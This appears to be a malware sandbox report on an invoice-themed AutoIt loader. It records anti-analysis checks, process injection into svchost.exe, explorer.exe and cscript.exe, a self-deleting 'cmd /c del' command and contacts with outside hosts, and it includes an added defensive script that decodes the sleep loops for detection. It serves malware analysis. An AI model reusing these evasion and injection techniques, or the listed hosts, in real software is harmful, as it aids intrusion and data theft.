Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038EB1E push esp; retn 0000h 2_2_0038EB1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038EB02 push esp; retn 0000h 2_2_0038EB03
Source: C:\Windows\explorer.exe Code function: 3_2_080E49B5 push esp; retn 0000h 3_2_080E4AE7
Source: C:\Windows\explorer.exe Code function: 3_2_080E4B02 push esp; retn 0000h 3_2_080E4B03
Source: C:\Windows\explorer.exe Code function: 3_2_080E4B1E push esp; retn 0000h 3_2_080E4B1F
Source: C:\Windows\explorer.exe Code function: 3_2_090A0B02 push esp; retn 0000h 3_2_090A0B03
Source: C:\Windows\explorer.exe Code function: 3_2_090A0B1E push esp; retn 0000h 3_2_090A0B1F
Source: C:\Windows\explorer.exe Code function: 3_2_090A09B5 push esp; retn 0000h 3_2_090A0AE7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0035262B push ecx; ret 4_2_0035263E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0209DFA1 push ecx; ret 4_2_0209DFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00080000 push C69438D7h; iretd 4_2_00080005
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_000991ED push ecx; iretd 4_2_000991EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0008F365 pushad ; ret 4_2_0008F36D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00098389 push esp; iretd 4_2_0009838B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009D4A5 push eax; ret 4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_000964DA push edi; retf 4_2_000964FE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009D4FB push eax; ret 4_2_0009D562
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009D4F2 push eax; ret 4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0009D55C push eax; ret 4_2_0009D562
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe File created: \commercail invoice and dhl awb tracking details.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0125F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0125F98E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_012D1C41
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe API/Special instruction interceptor: Address: 1B3204
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731C25A
Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\cscript.exe API/Special instruction interceptor: Address: 7731C25A
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 89B6E second address: 89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4248
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5576
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 1595
Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 1022
Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 8948
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe API coverage: 4.4 %
Source: C:\Windows\SysWOW64\cscript.exe API coverage: 4.5 %
Source: C:\Windows\explorer.exe TID: 1964 Thread sleep time: -8496000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1964 Thread sleep time: -11152000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep count: 1022 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep time: -2044000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep count: 8948 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep time: -17896000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
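The sleep figures above are easy to misread: the report prints negative values with an "s" suffix, but the minus sign is the relative-interval convention of NtDelayExecution and the magnitudes only make sense as milliseconds. The check is arithmetic: each "Thread sleep time" total divides exactly by one "threadDelayed" count of the same process, and the quotient is 2000 every time, i.e. a loop of Sleep(2000) calls. The script below, an added example that is not part of the sandbox report, performs that pairing over the lines above. The millisecond interpretation and the pairing-by-divisibility are this example's assumptions; the TID 1340 total has no count line in the report and is left unpaired.

```python
"""Decode the report's thread-sleep figures into per-call intervals.

Added example for this report, not part of the Joe Sandbox output.  Assumption
(not stated by the report): the 'Thread sleep time' values are milliseconds
despite the 's' suffix, and the minus sign is the NtDelayExecution convention
for a relative interval.  Both are inferred from every total dividing exactly
by a 'threadDelayed' call count of the same process.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed input: the sleep-related lines copied from the report above.
REPORT_LINES = [
    r"Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4248",
    r"Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5576",
    r"Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 1022",
    r"Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 8948",
    r"Source: C:\Windows\explorer.exe TID: 1964 Thread sleep time: -8496000s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -420000s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 1964 Thread sleep time: -11152000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep count: 1022 > 30",
    r"Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep time: -2044000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep count: 8948 > 30",
    r"Source: C:\Windows\SysWOW64\cscript.exe TID: 2064 Thread sleep time: -17896000s >= -30000s",
]

SLEEP_RE = re.compile(
    r"^Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: "
    r"-(?P<total>\d+)s >= -(?P<limit>\d+)s$"
)
# Both phrasings the report uses for the number of delay calls.
COUNT_RE = re.compile(
    r"^Source: (?P<proc>\S+) (?:Window / User API: threadDelayed|TID: \d+ Thread sleep count:) "
    r"(?P<count>\d+)"
)


@dataclass
class SleepLoop:
    process: str
    tid: int
    total_ms: int          # report figure, read as milliseconds (assumption)
    limit_ms: int          # sandbox threshold printed on the same line
    calls: Optional[int]   # matching threadDelayed count, if one divides evenly

    @property
    def interval_ms(self) -> Optional[int]:
        return self.total_ms // self.calls if self.calls else None

    @property
    def exceeds_limit(self) -> bool:
        return self.total_ms >= self.limit_ms


def decode(lines: List[str]) -> List[SleepLoop]:
    """Pair each sleep-time line with a call count of the same process.

    Count lines carry no TID, so pairing is by divisibility: N calls of a fixed
    Sleep(x) total exactly N*x.  A set absorbs the report's repeated counts."""
    counts: Dict[str, Set[int]] = {}
    for line in lines:
        m = COUNT_RE.match(line)
        if m:
            counts.setdefault(m["proc"], set()).add(int(m["count"]))
    loops: List[SleepLoop] = []
    for line in lines:
        m = SLEEP_RE.match(line)
        if not m:
            continue
        total = int(m["total"])
        candidates = [c for c in counts.get(m["proc"], ()) if total % c == 0]
        # If several counts divide the total, take the largest (shortest interval).
        loops.append(SleepLoop(m["proc"], int(m["tid"]), total, int(m["limit"]),
                               max(candidates) if candidates else None))
    return loops


def per_process_seconds(loops: List[SleepLoop]) -> Dict[str, float]:
    """Wall-clock time each process spent in the observed sleep loops."""
    out: Dict[str, float] = {}
    for lp in loops:
        out[lp.process] = out.get(lp.process, 0.0) + lp.total_ms / 1000.0
    return out


if __name__ == "__main__":
    loops = decode(REPORT_LINES)
    for lp in loops:
        print(f"{lp.process} TID {lp.tid}: {lp.total_ms / 1000:.0f} s total, "
              f"{lp.calls} calls x {lp.interval_ms} ms, over limit: {lp.exceeds_limit}")
    print(per_process_seconds(loops))
```

The ratio is the number worth alerting on: thousands of identical 2-second sleeps issued from explorer.exe or cscript.exe is a stalling loop, not UI code. Counting Sleep/NtDelayExecution calls per thread over a window in your own telemetry reproduces the sandbox's "count > 30" and "total >= 30 s" conditions.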
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127C2A2 FindFirstFileExW, 0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B68EE FindFirstFileW,FindClose, 0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose, 4_2_0035F0D3
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_012442DE
Source: explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000002.869194618.0000000003DDA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000003.00000000.349305261.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012BEAA2 BlockInput, 0_2_012BEAA2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01272622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_012442DE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01264CE8 mov eax, dword ptr fs:[00000030h] 0_2_01264CE8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_001B3470 mov eax, dword ptr fs:[00000030h] 0_2_001B3470
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_001B34D0 mov eax, dword ptr fs:[00000030h] 0_2_001B34D0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_001B1E70 mov eax, dword ptr fs:[00000030h] 0_2_001B1E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007200EA mov eax, dword ptr fs:[00000030h] 2_2_007200EA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00720080 mov ecx, dword ptr fs:[00000030h] 2_2_00720080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007426F8 mov eax, dword ptr fs:[00000030h] 2_2_007426F8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_02080080 mov ecx, dword ptr fs:[00000030h] 4_2_02080080
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020800EA mov eax, dword ptr fs:[00000030h] 4_2_020800EA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020A26F8 mov eax, dword ptr fs:[00000030h] 4_2_020A26F8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_012A0B62
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012609D5 SetUnhandledExceptionFilter, 0_2_012609D5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01272622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0126083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0126083F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01260C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_01260C21
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00351335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00351335

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 192.185.209.182 80
Source: C:\Windows\explorer.exe Network Connect: 65.21.196.90 80
Source: C:\Windows\explorer.exe Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe Network Connect: 84.32.84.32 80
Source: C:\Windows\explorer.exe Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe Network Connect: 162.241.203.16 80
Source: C:\Windows\explorer.exe Domain query: www.ilovetvs.com
Source: C:\Windows\SysWOW64\cscript.exe NtUnmapViewOfSection: Indirect: 0x5B9DB9
Source: C:\Windows\SysWOW64\cscript.exe NtClose: Indirect: 0x5B9DC5
Source: C:\Windows\SysWOW64\cscript.exe NtQueueApcThread: Indirect: 0x5BA531
Source: C:\Windows\SysWOW64\cscript.exe NtMapViewOfSection: Indirect: 0x5B9D47
Source: C:\Windows\SysWOW64\svchost.exe NtClose: Indirect: 0x38A56C
Source: C:\Windows\SysWOW64\svchost.exe NtQueueApcThread: Indirect: 0x38A4F2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 350000
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_012A1201
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01282BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_01282BA5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AB226 SendInput,keybd_event, 0_2_012AB226
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AE355 mouse_event, 0_2_012AE355
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_012A0B62
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_012A1663
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman-
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01260698 cpuid 0_2_01260698
Source: C:\Windows\SysWOW64\cscript.exe Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA, 4_2_00353030
Source: C:\Windows\SysWOW64\cscript.exe Code function: GetLocaleInfoW,wcsncmp, 4_2_003641BC
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127333F GetSystemTimeAsFileTime, 0_2_0127333F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0129D27A GetUserNameW, 0_2_0129D27A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_0127B952
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_012442DE

Stealing of Sensitive Information

Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
